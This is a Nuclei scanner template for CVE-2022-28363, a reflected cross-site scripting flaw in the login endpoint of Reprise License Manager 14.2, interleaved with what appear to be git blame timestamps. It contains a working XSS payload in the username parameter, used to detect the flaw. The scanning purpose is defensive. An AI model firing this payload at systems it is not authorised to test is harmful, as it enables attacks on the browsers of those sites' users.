2022-04-10 07:11:31 +00:00
id : CVE-2022-28363
info :
2022-09-09 17:34:37 +00:00
name : Reprise License Manager 14.2 - Cross-Site Scripting
2022-04-10 07:11:31 +00:00
author : Akincibor
2022-09-16 20:03:07 +00:00
severity : medium
2022-04-10 07:11:31 +00:00
description : |
2022-09-16 19:50:10 +00:00
Reprise License Manager 14.2 contains a reflected cross-site scripting vulnerability in the /goform/login_process 'username' parameter via GET, whereby no authentication is required.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.
2023-09-06 11:59:08 +00:00
remediation : |
Upgrade to a patched version of Reprise License Manager or apply the vendor-supplied patch to mitigate this vulnerability.
2022-04-10 07:11:31 +00:00
reference :
- https://www.reprisesoftware.com/products/software-license-management.php
- https://github.com/advisories/GHSA-rpvc-qgrm-r54f
- http://packetstormsecurity.com/files/166647/Reprise-License-Manager-14.2-Cross-Site-Scripting-Information-Disclosure.html
2022-09-16 19:50:10 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-28363
2022-04-18 13:10:41 +00:00
classification :
2022-09-16 20:03:07 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
2022-09-16 19:50:10 +00:00
cve-id : CVE-2022-28363
2022-09-16 20:03:07 +00:00
cwe-id : CWE-79
2023-08-31 11:46:18 +00:00
epss-score : 0.00237
2023-12-12 11:07:52 +00:00
epss-percentile : 0.61582
2023-09-06 11:59:08 +00:00
cpe : cpe:2.3:a:reprisesoftware:reprise_license_manager:14.2:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : reprisesoftware
product : reprise_license_manager
2023-12-05 09:50:33 +00:00
tags : xss,rlm,packetstorm,cve,cve2022,reprisesoftware
2022-04-10 07:11:31 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-04-10 07:11:31 +00:00
- method : GET
path :
- "{{BaseURL}}/goform/login_process?username=test%22%3E%3Csvg/onload=alert(document.domain)%3E"
matchers-condition : and
matchers :
- type : word
part : body
words :
- '<svg/onload=alert(document.domain)>'
- 'Login Failed'
condition : and
- type : word
part : header
words :
- "text/html"
2023-07-11 19:49:27 +00:00
- type : status
status :
- 200
2023-12-29 09:30:44 +00:00
# digest: 4b0a00483046022100d093b317b2f54c65291c2be264f8698110565d6ddf8884847af3aab5c870170c022100a0ea673e3b91702d9837d0a7be9aaf18c5d3c03b91bcf2b724e2082c4a8de695:922c64590222798bb761d5b6d8e72950